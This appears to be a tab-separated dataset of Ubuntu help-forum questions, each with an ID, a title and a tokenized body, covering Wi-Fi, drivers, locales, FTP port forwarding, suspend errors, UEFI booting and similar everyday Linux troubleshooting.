349813	anybody tried and got dark souls working on wine ?	i bought dark souls on sale from steam and i looked on wine 's website to confirm it is playable . i 'm only confused with what i need to install to make the game work . i just would like to know if anyone had any luck with playing the game on linux and what you had to do to get it working . i appreciate any help that i can get .
349820	used wireless as hotspot but connected device ( iphone 3 ) gets no conection ?	if got an eeepc with interenet connection via lan . because i have no wlan in my office i want to share it to my iphone -- although the iphone can connect to the laptop it does not get any ipadress and or internet connection . i used system - > system settings - > network - > wireless - > hotspot to establish the connection and left everything on default . eeepc has internet access via lan and gets it ipadress automatically the connecting device is a standard iphone 3gs with ios 6 as this is a firm network ipadresses are not in standard range of an home-network ubuntu on laptop is 12.04 with unity any idea what might be the problem or how to fix it ? please excuse if i have not given enough or the right information i am really new to the linux world and happily will provide further information .
349821	unsupported locale prevents me from starting apps	i have the following locale settings when i type export : declare -x lang= '' es_es.iso-8859-1 '' declare -x language= '' es : en '' declare -x lc_address= '' ms_my.utf-8 '' declare -x lc_identification= '' ms_my.utf-8 '' declare -x lc_measurement= '' ms_my.utf-8 '' declare -x lc_monetary= '' ms_my.utf-8 '' declare -x lc_name= '' ms_my.utf-8 '' declare -x lc_numeric= '' ms_my.utf-8 '' declare -x lc_paper= '' ms_my.utf-8 '' declare -x lc_telephone= '' ms_my.utf-8 '' declare -x lc_time= '' ms_my.utf-8 '' i am spanish living in malaysia , so i actually want my system in spanish but with the country setup for malaysia . i actually do n't know whether i have set it up right or not . now , i try to launch a recently installed application , git-gui ( amongst some others ) , and i just get the following error message : $ git-gui we are sorry , command-not-found failed ! please send a bug report at : https : //bugs.launchpad.net/command-not-found/+filebug please attach the following info to the report : command-not-found version : 0.3 python version : 3.3.1 final 0 distributor id : ubuntu description : ubuntu 13.04 release : 13.04 codename : raring exception information : unsupported locale setting traceback ( most recent call last ) : file `` /usr/lib/python3/dist-packages/commandnotfound/util.py '' , line 24 in crash_guard callback ( ) file `` /usr/lib/command-not-found '' , line 69 , in main enable_i18n ( ) file `` /usr/lib/command-not-found '' , line 40 , in enable_i18n locale.setlocale ( locale.lc_all , '' ) file `` /usr/lib/python3.3/locale.py '' , line 541 , in setlocale return _setlocale ( category , locale ) locale.error : unsupported locale setting so how can i fix my locales ? what would be the right setup for my system to match my requirements and also the requirements of applications such as git-gui ?
349834	world of warcraft connectivity , settings and character issues	i 've installed wow a few weeks back on my ubuntu 13.04 using playonlinux . after an initial period where everything was fine , i started experiencing some errors . i had pretty much two ways of starting up wow : one was through the pol shortcut , and the other one was to simply navigate to the pol folder containing my wow installation and clicking on the exe file . however , starting wow from pol had a peculiar problem : my settings never got saved . every time i closed the game , i would be presented with the eula again , had to reenter my account details again and all of my graphical settings were back to default . it was as if my wtf folder was being cancelled every time i logged out . so i `` fixed '' this problem by skipping pol entirely , i copied the wtf from another wow folder on my hd and sticking it into the pol wow folder . so everything was fine , as long as i did n't start wow from pol or i would have had to do it all over again . however , the one problem that bugs me the most now is that i 'm having connectivity issues . sometimes i ca n't get to the character selection screen . when i do and i try to log into one my characters ( regardless of which one it is , or on whichever server they 're on ) the loading bar gets stuck at 90 % and i either get a `` character not found '' error message or `` no instance servers are available '' if the character is in an instance . this is pretty much a lottery : sometimes i manage to log and play , some others i do n't . it also happens while i 'm in the game and i try to zone into an instance : the load bar gets stuck , i 'm forced to quit the game , and when i try to log back on i 'm presented with the above problems . it 's also worth mentioning that if i try running wow from my `` clean '' wow folder that i copied from a windows installation ( that used to work by simply double clicking the exe when i was on ubuntu 12.04 ) , i get a `` bad format '' error . any tips on what i could do to fix any of those problems ? i would n't really mind punching in all the graphical settings and account details again , as long as i have the certainty that i can actually log in ! thanks .
349835	ca n't install drivers for epson wp-4530	it looks like it 's installing ok then i get an error : ( reading database ... 177199 files and directories currently installed . ) unpacking epson-inkjet-printer-escpr : i386 ( from ... /epson-inkjet-printer-escpr_1.3.0-1lsb3.2_i386.deb ) ... dpkg : dependency problems prevent configuration of epson-inkjet-printer-escpr : i386 : epson-inkjet-printer-escpr : i386 depends on lsb ( > = 3.2 ) . dpkg : error processing epson-inkjet-printer-escpr : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : epson-inkjet-printer-escpr : i386 can anyone help me with this ? tried install under linux mint 14 and ubuntu 12.04 same problem . tried installing using cups and software center . driver is from http : //download.ebz.epson.net/dsc/search/01/search/ ? osc=lx which is only driver site i can find for this printer please help
349836	best way for automatic server restart after crash	what is the best , and simplest way to monitor system activity and reboot automaticly after the system has crashed and is not responding . system server 12.04
349837	ubuntu 12.04 not connecting to wifi networks	i have a sony viao laptop installed with ubuntu 12.04 rfkill list all 1 : hci0 : bluetooth soft blocked : no hard blocked : no 2 : sony-wifi : wireless lan soft blocked : no hard blocked : no 3 : sony-bluetooth : bluetooth soft blocked : no hard blocked : no 4 : phy0 : wireless lan soft blocked : no hard blocked : no sudo lshw -c network *-network description : wireless interface product : ar9485 wireless network adapter vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 01 serial : a4:17:31 : cc:25:3b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.5.0-39-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:16 memory : c3000000-c307ffff memory : c0000000-c000ffff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0e:00.0 logical name : eth0 version : 07 serial : 54:53 : ed:33 : a2:8b size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=192.168.1.6 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : c4404000-c4404fff memory : c4400000-c4403fff update iwconfig eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=16 dbm retry long limit:7 rts thr : off fragment thr : off power management : off i have tried whatever i could find on forums but could n't get wifi connected . here is the list of what i have tried . wireless is disabled by hardware switch on sony vaio added `` blacklist sony_laptop '' to /etc/modprobe.d/blacklist.conf also tried http : //www.emmolution.org/ ? p=253 also installed latest version ( 3.5.4.1 ) from here . http : //wireless.kernel.org/en/users/download/stable/ # recommended it detects all the wifi 's but wont connect . i can connect to my binatone router using my android phone and mac air but not from ubuntu . it was working fine till yesterday . but my laptop shut off after battery discharge and since then its not connecting . please help me here . one is not supposed to waste a day trying connecting to wifi . thanks a lot .
349840	screen shows only horizontal stripes after login	after upgrading to 13.04 only horizontal stripes are displayed after logging in . it needs several restarts to get a proper display on the screen .
349845	does the web-brower app need some extra css styling , to style buttons and such	as you can see from the image below , the show alert box , renders differently , then in firefox , ie , chrome . does it need an extra styling options to style it ? like -webkit , -moz . or can i keep using the w3c standard like border , border-radius and such .
349846	numkeypad not working on dell n5110 after installing 13.04	i have a dell inspiron n5110 with ubuntu 13.04 fresh install.before when i was using 11.10 / 12.04 numkeypad used to work .now it works only at the log in where i type password . after the login it doesnt work at all .
349849	need to return log in password	i removed the guest account and i only have an admin account , with an active password . couple of weeks ago i disabled password through `` terminal '' command line . today i want to return logging in with password , but when i activate this option in the settings , the start screen password is not asked by system . how can i restore logging in to the system with a password ?
349850	is it safe for not having primary partition ?	i know about basic primary and logical partition rules , what i want to know is is it safe to only have logical partition only ? i just want to run linux on my computer , so basically i do n't need at least 1 primary like in ms windows , am i right ?
349851	programmatically sync dropbox without daemon running	i would like to 'manually ' force dropbox to sync at certain times ( eg at regular , daily intervals using cron , as part of a larger backup script ) . my goal is to substitute the dropbox daemon with single `` sync '' command invocations at only the times that i control . looking at the documentation for the dropbox command on ubuntu , i only see a way to start/stop the daemon , but not to force it to sync . is there a lower level api available that can accomplish this ?
349855	compile .less files into .css after every update	i have installed node , and npm . with npm i downloaded less . and when i do lessc styles.less styles.css -x -w in terminal , it compiles and compresses the code , but doesnt watch the file for changes , since im expecting less to auto compile and refresh the page automatically . so , if i do any changes in my styles.less , every-time i have to go to terminal and enter the command to compile the less css . also , the compiler does not even show any compile errors . please guide me on how to achieve the above . this is my first day with less css .
349857	trying to connect to vsftpd , failed to retrieve directory listing	something is really not working here . i have the following error in using filezilla to connect to a remote machine running vsftpd : command : list error : connection timed out error : failed to retrieve directory listing i am trying to set up ftp services on 3 machines behind a residential isp firewall . all are ubuntu 12.04 server lts , and i am restricted from using port 21 externally at the remote site . well.. ok , i confess , it 's myself who is imposing the restriction . i just wanted to sound like i was working for a real company . anyway , only 1 of the 3 systems could have been assigned to 21 , so it would still be an issue . i have tried the solutions for adding `` pasv_ ... '' lines , but i still can not get past the list stage of connecting . http : //stackoverflow.com/questions/4723023/vsftpd-error-listing-directories http : //www.linuxquestions.org/questions/linux-server-73/vsftpd-error-failed-to-retrieve-directory-listing-878838/ http : //serverfault.com/questions/421161/how-to-configure-vsftpd-to-work-with-passive-mode http : //www.linuxquestions.org/questions/linux-networking-3/vsftpd- can not -list-files-but-can-change-dirs-519340/ so , having failed that , what might the problem be ? i read on this site that i need to forward ports 20 and 21 . right now the remote sites have ports like 10000 , 11000 , 12000 forwarded to the internal port 21 on each of the systems . should i forward some additional ports in to 20 ? it does n't make sense because that port is n't even open , vsftpd is only listening on 21 . all i want is for a successful ftp connection through these forwarded ports , i am frustrated because i have successfully forwarded for services like ssh , apache2 , etc and i do n't get what is broken here . thx joren for correcting my formatting ! edit : i have been messing around with my testing vps which is directly exposed to the internet , i installed vsftpd just to see what happens , and the output of 'netstat -tuna ' shows that a successful connection from my filezilla client looks like this : tcp 0 0 vps.vps.vps.vps:21 fi.le.zil.la:54288 established tcp 0 0 vps.vps.vps.vps:46403 fi.le.zil.la:54289 time_wait note : the ftp server at my vps also did n't work at first , due to a completely unrelated issue involving virtualized environments ( `` 500 oops : priv_sock_get_cmd '' ) . read : i am starting to see that ubuntu 's vsftpd does n't work 'out-of-the-box ' like apache2 and sshd do , for any frustrated novice sysadmins out there , do n't think you 're stupid if it is n't working first thing ... my testing vps does n't have a firewall , so all ports are directly available for access by the ftp daemon . after running this test , i see that it is possible that this secondary connection is being blocked at the remote site where i 'm having issues ( random ports such as 46403 ) . at least now i have confirmed that there are no nat issues with my filezilla , because clearly filezilla is opening random ports and talking with my vps ok . the one thing that makes no sense , is the config 'connect_from_port_20=yes ' is set on my vps ftp config , yet i ca n't see any connections using port 20 ! ! ! this is why i do n't even know if this port needs to be forwarded behind a firewall . one of my knowledge deficiencies is i do n't even know what port 20 does , and i ca n't learn through experience because i 've never seen any indication the port is ever used duing connecting , downloading or uploading . ok , i found some problems ( there 's clearly more then one thing wrong ) - this has to do with port forwarding . suspect original problem ( before customizing vsftpd.conf ) filezilla initially connects to remote port 10000 , == > goes to 21 on internal ftp server ( ok ) ftp server opens a random port ( not 20 ) like 45678 , but the router obviously does n't have a rule for this randomly assigned port . it sends a message telling filezilla to also connect to 45678 . filezilla client opens up its own port on my end behind nat ( ok ) filezilla sends connection request to 45678 , but the remote router does n't accept the connection , as there is no forwarding rule for that port . now , the problem ( s ) i created : pasv_enable=yes pasv_min_port=10000 pasv_max_port=10000 filezilla connects to remote port 10000 , == > goes to 21 on internal ftp server ( ok ) ftp server opens the only port it can , 10000 , [ stupid moment ] because i have that port in my head associated with that system . but 10000 is actually the wan side counterpart for 21 on this system . server sends a message for filezilla to connect to 10000 , and listens internally on 10000 filezilla client opens up its own random port on my end ( ok ) filezilla tries the secondary connection at port 10000 , the remote router deflects it to port 21 again where it must be ignored or lost , while the ftp server waits for a connection to internal port 10000 that never arrives . ( fail ) second problem i created : i tried to bind port 21 this time , but i think that messed up filezilla . pasv_enable=yes pasv_min_port=21 pasv_max_port=21 filezilla connects to remote port 10000 , == > goes to 21 on internal ftp server ( ok ) ftp server opens port 21 ( or maybe fails because 21 is already used ) if it succeeded , it sent a message for filezilla to connect to port 21 . filezilla client opens up its own random port on my end ( ok ) filezilla sends a request for list to 21 , which the router is not going to accept ... ( fail ) conclusion : as long as the port is being changed by a router , the ftp server will never be able to tell the client to connect to the right port . if you try to use the internal port , the client will run up against the router . if you try to specifiy the external port , the router will deflect the incoming connection to a different number -- which the server was not expecting . i will test a solution and report back here with the results . i think , because the ftp server protocol appears to tell the client which port to connect to , that secondary connection must have the same external port number as internal . i will call this a 'secondary connection ' and i think it has something to do with the port 20 thing that i do n't understand . so , i will contact the remote site and have an additional port forwarded directly , so the ftp server can open a connection internally , and the client will be able to send a connection request to that exact port number . new plan : ( note : the ' % ' is meant to show the port getting changed by the remote router . ) server # 1 primary connection : 21 < -- % -- > 10000 secondary connection 10001 < -- -- - > 10001 vsftp.conf : pasv_min_port=10001 pasv_max_port=10001 server # 2 primary connection 21 < -- % -- > 11000 secondary connection 11001 < -- -- - > 11001 vsftp.conf : pasv_min_port=11001 pasv_max_port=11001 server # 3 primary connection 21 < -- % -- > 12000 secondary connection 12001 < -- -- - > 12001 vsftp.conf : pasv_min_port=12001 pasv_max_port=12001
349858	failed to resume from sleep mode	i 'm running ubuntu 12.04 here . i 've set my laptop so that it goes into sleep mode every time i shut the screen , but as it resumes , there is an error that appears for about two seconds before the login screen shows up . [ xxx.xxxxxx ] dpn_run_callback ( ) : pnp_bus_resume+0x0/0x70 returns -19 [ xxx.xxxxxx ] pm : device 00:00 failed to resume : error -19 again , it only appears for two seconds , so it is n't the end of the world or anything , but i 'm afraid it may lead to other complications if i do n't try and fix it . any thoughts on how to fix this ? looking further into pm.suspend.log it looks like the errors read as follows : /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : having networkmanager wake interfaces back up ... failed . all other processes end with success.. i 'm still pretty new to ubuntu so i 'm not really sure what to do from here . the log of the most recent suspend-resume cycle is as follows : initial commandline parameters : wed sep 25 11:07:55 edt 2013 : running hooks for suspend . running hook /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : /usr/lib/pm-utils/sleep.d/000kernel-change suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging suspend suspend : linux jason-ao756 3.8.0-30-generic # 44~precise1-ubuntu smp fri aug 23 18:32:41 utc 2013 x86_64 x86_64 x86_64 gnu/linux module size used by rfcomm 47864 0 bnep 18258 2 bluetooth 247024 10 rfcomm , bnep parport_pc 28284 0 ppdev 17113 0 arc4 12573 2 ath9k 151796 0 snd_hda_codec_hdmi 37407 1 snd_hda_codec_realtek 79916 1 mac80211 630977 1 ath9k snd_hda_intel 44339 5 snd_hda_codec 141761 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13668 1 snd_hda_codec snd_pcm 102477 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec ath9k_common 14053 1 ath9k snd_seq_midi 13324 0 snd_rawmidi 30417 1 snd_seq_midi snd_seq_midi_event 14899 1 snd_seq_midi i915 620419 2 ath9k_hw 422432 2 ath9k , ath9k_common uvcvideo 82214 0 snd_seq 61930 2 snd_seq_midi , snd_seq_midi_event ath 24123 3 ath9k , ath9k_common , ath9k_hw snd_timer 29989 2 snd_pcm , snd_seq coretemp 13596 0 snd_seq_device 14497 3 snd_seq_midi , snd_rawmidi , snd_seq cfg80211 525244 3 ath9k , mac80211 , ath videobuf2_core 40785 1 uvcvideo kvm_intel 137899 0 mei 41820 0 drm_kms_helper 49597 1 i915 videodev 130053 2 uvcvideo , videobuf2_core drm 287564 3 i915 , drm_kms_helper psmouse 97873 0 kvm 455932 1 kvm_intel snd 69533 19 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device videobuf2_vmalloc 13056 1 uvcvideo joydev 17613 0 ghash_clmulni_intel 13259 0 videobuf2_memops 13202 1 videobuf2_vmalloc soundcore 12680 1 snd acer_wmi 32858 0 cryptd 20501 1 ghash_clmulni_intel sparse_keymap 13890 1 acer_wmi snd_page_alloc 18798 2 snd_hda_intel , snd_pcm serio_raw 13215 0 i2c_algo_bit 13564 1 i915 video 19652 2 i915 , acer_wmi wmi 19256 1 acer_wmi lpc_ich 17144 0 mac_hid 13253 0 microcode 23017 0 lp 17799 0 parport 46562 3 parport_pc , ppdev , lp ahci 25879 2 libahci 31606 1 ahci sdhci_pci 18721 0 sdhci 33141 1 sdhci_pci tg3 165622 0 ptp 18668 1 tg3 pps_core 14080 1 ptp total used free shared buffers cached mem : 1796004 1559084 236920 0 37536 717436 -/+ buffers/cache : 804112 991892 swap : 1907708 80648 1827060 /usr/lib/pm-utils/sleep.d/00logging suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : /usr/lib/pm-utils/sleep.d/00powersave suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > /usr/lib/pm-utils/sleep.d/01pulseaudio suspend suspend : success . running hook /etc/pm/sleep.d/10_grub-common suspend suspend : /etc/pm/sleep.d/10_grub-common suspend suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : having networkmanager put all interaces to sleep ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/75modules suspend suspend : /usr/lib/pm-utils/sleep.d/75modules suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/90clock suspend suspend : /usr/lib/pm-utils/sleep.d/90clock suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : /usr/lib/pm-utils/sleep.d/94cpufreq suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : stop : unknown instance : /usr/lib/pm-utils/sleep.d/95anacron suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : /usr/lib/pm-utils/sleep.d/95hdparm-apm suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95led suspend suspend : /usr/lib/pm-utils/sleep.d/95led suspend suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : kernel modesetting video driver detected , not using quirks . /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler suspend suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video suspend suspend : kernel.acpi_video_flags = 0 /usr/lib/pm-utils/sleep.d/99video suspend suspend : success . running hook /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : /etc/pm/sleep.d/novatel_3g_suspend suspend suspend : success . wed sep 25 11:07:56 edt 2013 : performing suspend wed sep 25 11:08:05 edt 2013 : awake . wed sep 25 11:08:05 edt 2013 : running hooks for resume running hook /etc/pm/sleep.d/novatel_3g_suspend resume suspend : /etc/pm/sleep.d/novatel_3g_suspend resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/99video resume suspend : /usr/lib/pm-utils/sleep.d/99video resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : /usr/lib/pm-utils/sleep.d/98video-quirk-db-handler resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95led resume suspend : /usr/lib/pm-utils/sleep.d/95led resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /dev/sda : setting advanced power management level to 0xfe ( 254 ) apm_level = 254 /usr/lib/pm-utils/sleep.d/95hdparm-apm resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/95anacron resume suspend : /usr/lib/pm-utils/sleep.d/95anacron resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : /usr/lib/pm-utils/sleep.d/94cpufreq resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/90clock resume suspend : /usr/lib/pm-utils/sleep.d/90clock resume suspend : not applicable . running hook /usr/lib/pm-utils/sleep.d/75modules resume suspend : reloaded unloaded modules . /usr/lib/pm-utils/sleep.d/75modules resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : failed to connect to wpa_supplicant - wpa_ctrl_open : no such file or directory /usr/lib/pm-utils/sleep.d/60_wpa_supplicant resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : having networkmanager wake interfaces back up ... failed . /usr/lib/pm-utils/sleep.d/55networkmanager resume suspend : success . running hook /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : /etc/pm/sleep.d/10_unattended-upgrades-hibernate resume suspend : success . running hook /etc/pm/sleep.d/10_grub-common resume suspend : /etc/pm/sleep.d/10_grub-common resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/01pulseaudio resume suspend : welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > welcome to pulseaudio ! use `` help '' for usage information . > > > > > > /usr/lib/pm-utils/sleep.d/01pulseaudio resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00powersave resume suspend : /usr/lib/pm-utils/sleep.d/00powersave resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/00logging resume suspend : /usr/lib/pm-utils/sleep.d/00logging resume suspend : success . running hook /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : /usr/lib/pm-utils/sleep.d/000kernel-change resume suspend : success . wed sep 25 11:08:06 edt 2013 : finished .
349863	why physical host nic ca n't be used in kvm	why bridged networking is required for guest vm 's in kvm ? why we ca n't use the host nic to provide networking for guests .
349864	capturing text output to a log , while printing realtime to terminal	my output prints approximately 1 line per second to the terminal , maybe 100-200 lines in total . i 've tried to capture the output using tee , but it prints all the lines at the end of the process , not in realtime . i also tried using the script command , but the output file had some weird characters such as ^m printed along with the results , which is no good . how can i print in realtime while capturing ! ?
349867	set up nodes for ubuntu cloud 12.04	i am trying to setup ubuntu cloud infrastructure using maas and juju . however , i can not get past the commissioning step of node addition . i have added all the node mac id . the nodes are connected to the network and installed with ubuntu 12.04 server . i have used the unmanaged mode of network .
349869	enable mute button even if screen is locked	is it possible to make it enable that when i press mute button on my laptop it 'll work even if screen is locked .
349870	error message `` access denied '' setting up vpn	i am new to linux and i am trying to learn as much as possible . i have installed unbutu 13.0.4 and selected basic server , i am now trying to setup vpn to access my files from anywhere . however getting errors when disabling encryption . the steps i am following is below from one of the member here : easiest way to setup ubuntu as a vpn server i am getting errors on doing the steps below : refuse-pap refuse-chap refuse-mschap error message : access denied , even though i am logged on as root . any help will be much appreciated !
349871	trying to make it so i can plug my usb in and boot a linux	i already have my usb set to load first when my computer turns on , but i have a 12.04 version of linux and under the isolinux folder i do not see a iso to put onto my usb .
349873	use `` connect to server '' to connect to sftp	how do i connect to my remote sftp account using ubuntu 's `` connect to server '' option ? when i have the `` connect to server '' dialog box on my screen , the `` service type '' only shows : ftp ( with login ) public ftp those are the only ftp options i can see in the dropdown . no sftp option ?
349874	boot-repair boot info	while installing freebsd alongside ubuntu installation on hdd , system boots grub shell and resign to boot grub menu further . boor-repair reported errors , please look at me boot info http : //paste.ubuntu.com/6154175/ thanks !
349876	dell inspiron mini 10 broadcom wifi driver	i need help activating my broadcom wifi driver for dell inspiron mini 10 . activation from the hardware option of ubuntu fails everytime i try to activate . appreciate your assistance . best ,
349878	ubunto 12.04 fails to boot ( eufi ) after motherboard changed	i have a disk with ubuntu 12.04 installed that boots via eufi and grub ( probably grub2 ) . i 've tried to use it to boot a physically different , but otherwise absolutely identical system ( motherboard , cpu and bios version ) , and the bios fails to find a bootable operating system . i presume that either some knowledge of the bootable fs has to be written to the motherboard nvram , or that some motherboard serial number has to be written to the disk . however it is n't at all obvious where the error lies , or how to fix it . being able to swap motherboards is very useful if a system suffers from a motherboard failure ( or even a suspected one ) . especially when an identical system can be substituted . i can boot of an install image ( actually 13.04 ) and run efibootmgr - it does n't show a linux/ubuntu entry for that disk . a simple efibootmgr -d /dev/sdb -c made no difference . motherboard is an intel dq77kb
349880	macbook pro 5,5 dvd drive is busted , lubuntu bootable usb key does n't show in alt boot menu	i followed this http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx using a lubuntu 13.04 image amd64-mac ( there are 3 versions , ppc , 64bit pc , 64bit mac ) . i 'm not sure wether my mac can actually boot from usb , i also have refit installed , but i do n't know how to install ubuntu from refit .
349885	what constructive work can be done from spare 64 bit ubuntu system	i have some ubuntu x86_64 system lying around . i want to use them for good or maybe to show my students what all can be done using linux , distributed system and other software please guide me thanks
349898	why does cpu usage spike just when transmission is finishing a download ?	i noticed this when i was watching a video and it started lagging just before until shortly after a download finished . the second time i monitored it using top and the cpu rises above 100 % . my processor is n't a slow one ( intel core i7-3630qm quad core ) , and the `` average '' cpu usage of transmission is 3 % - 4 % . i was wondering what the cause of this curiosity is and what i could do about it ( besides using another bit-torrent client ) .
349900	rename files numerically ( date/time order )	i have 200 files in a folder which i downloaded . i downloaded them in a certain order -- often only a few seconds apart . i would like to append a number to the beginning of each of the files . so the first file i downloaded ( the oldest one ) would need to change from name.txt to 001_name.txt . all the way up to the last file ( most recently downloaded ) changing from name.txt to 200_name.txt . is this possible to do using the terminal ( as a batch ) ? many thanks in advance .
349903	merged etc , home , and var to copy user accounts and broke system how do i regain root privilages ( failed user account migration )	i merged etc , home , and var to copy user accounts and broke system how do i regain root privilages failed user account migration
349905	two audio sources mixed to headset	i 've been trying a while to get this working but have n't had any luck so far . so i use my laptop to skype while playing games on another computer , what i want to do is : take audio from my computer ( coming in to the onboard microphone 3.5mm jack ) mix it with the audio from my skype call and send it to my headset ( logitech g930 if it 's important ) i dont think i need to mess with the headset 's mic . i 've tried using pactl , qasmixer , qjackctl but maybe i have n't understood how these tools work . at the moment the best i 've managed to get is separate audio playing through my headphones and the laptop 's speakers . hopefully someone here is much better at this and knows where i 'm going wrong
349910	i am not able to install eclipse after uninstalling it	to remove eclipse i used : sudo apt-get autoremove eclipse rm -r ~/.eclipse/ now when installing i get this : anjali @ anjali-thinkpad-edge-e430 : ~ $ sudo apt-get install eclipse [ sudo ] password for anjali : reading package lists ... done building dependency tree reading state information ... done eclipse is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 608 not upgraded . anjali @ anjali-thinkpad-edge-e430 : ~ $ eclipse the program 'eclipse ' is currently not installed . you can install it by typing : sudo apt-get install eclipse-platform
349912	compiling c++ script with external libraries , not working	i ca n't seem to get this working . i have a c++ script that i have n't written myself , that i need to compile with g++ . the start of the script looks like this : # include `` x.hh '' # include `` y.hh '' # include < iostream > ... i understand that when using include with quotation marks , that means there are external libraries that have to be included when doing the compiling . the header files , x.hh and y.hh , as well as the files x.cc and y.cc ( wich i guess are the libraries ) plus the main script are all in the same folder . i 've tried to compile them with : g++ documents/cpp/script.cc -o script -l documents/cpp -lx -ly this returns the error : /usr/bin/ld can not find -lx /usr/bin/ld can not find -ly collect2 returned 1 exit status the search path is n't the same as i specified . even if i write : g++ documents/cpp/script.cc -o script -l sdfsdf/sdfsd-lx -ly it still looks in /usr/bin/ld folder . no matter what i write in -l , i cant get it to work . how ?
349914	did windows finally outsmart ubuntu ?	did windows8 finally achieve it 's life long ambition of locking out ubuntu from hardware ? ? ? in september 2013 my shiny new del xps 15z was delivered with windows8 pre installed . with the new secure boot and uefi in place i was thrown between one how-to and another all attempting to explain just how i would get ubuntu installed on my laptop here is what i did and still there is no end to the windows hell i am in i made a ubuntu livecd with 13.04 on it . i made a nice big partition that would house ubuntu from within windows i shut down windows with shutdown.exe /s /f /t 00 i disabled secure boot and used uefi boot order to start from my livecd from the grub2 menu that came up on the reboot i chose to `` try ubuntu without install '' from within ubuntu i chose the option to install ubuntu only to find that i do not have any partition to install ubuntu on and when i choose to change the partitions i get an error ! what to do next or is this the end of the road ? ? ? i hope not !
349915	virtual box network problems on windows 7 guest	i have installed windows 7 ( as guest ) using virtual box on my ubuntu 13.04 ( as host ) . everything was ok except some network problems . i have no problem with browsing websites in guest os ( windows 7 ) but there is another problem . i 've installed visual studio 2012 on the guest os and tried to connect to a tfs server which is on my lan . vs ca n't connect to the tfs server most of the times . but sometimes it connects and very soon it stops responding . it seems that there are some problems with such protocols . i have the same problem with plastic scm ( a distributed source control software ) when i want to sync source control repositories . i tried both nat and bridge modes on virtual box but none of them works .
